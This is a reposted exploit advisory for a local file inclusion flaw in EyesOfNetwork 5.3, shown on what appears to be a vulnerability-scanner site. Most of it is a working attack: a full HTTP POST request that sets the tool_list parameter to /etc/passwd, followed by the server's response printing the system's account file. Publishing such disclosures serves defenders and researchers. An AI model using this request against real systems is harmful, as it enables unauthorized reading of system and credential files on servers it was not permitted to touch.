Register
Online Vulnerability Scanner Tools
Code...
# Exploit Title: EyesOfNetwork 5.3 - LFI # Date: 10/01/2021 # Exploit Author: Audencia Business SCHOOL Red Team # Vendor Homepage: https://www.eyesofnetwork.com/en # Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso # Version: 5.3 The php not exclude other tools than proposed one. It's possible possible to include files when the parameter "tool_list=" is modified like that : ================================================================== POST /module/tool_all/select_tool.php HTTP/1.1 Host: 192.168.0.26 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 209 Origin: https://192.168.0.26 Connection: close Referer: https://192.168.0.26/module/tool_all/ Cookie: session_id=746751013; user_name=admin; user_id=1; user_limitation=0; group_id=1 (tool_list=FILE TO READ) page=bylistbox&host_list=127.0.0.1&tool_list=/etc/passwd&snmp_com=aze&snmp_version=2c&min_port=1&max_port=1024&username=&password=&snmp_auth_protocol=MD5&snmp_priv_passphrase=&snmp_priv_protocol=&snmp_context= ================================================================== Result a printed /etc/passwd document in the webpage : ================================================================== HTTP/1.1 200 OK Date: Sat, 09 Jan 2021 01:16:21 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3 X-Powered-By: PHP/5.4.16 Content-Length: 1529 Connection: close Content-Type: text/html; charset=UTF-8 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nagios:x:999:991::/var/spool/nagios:/sbin/nologin influxdb:x:998:998::/var/lib/influxdb:/bin/false systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin grafana:x:997:995:grafana user:/usr/share/grafana:/sbin/nologin polkitd:x:996:994:User for polkitd:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin snmptt:x:995:992:SNMP Trap Translator:/var/spool/snmptt:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:994:990::/var/lib/chrony:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin cacti:x:1000:991::/home/cacti:/bin/bash eon4apps:x:1001:991::/srv/eyesofnetwork/eon4apps:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin admin:x:1002:1000:admin:/home/admin:/bin/bash ==================================================================
Eyesofnetwork 5.3 lfi Vulnerability / Exploit Source : Eyesofnetwork 5.3 lfi
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes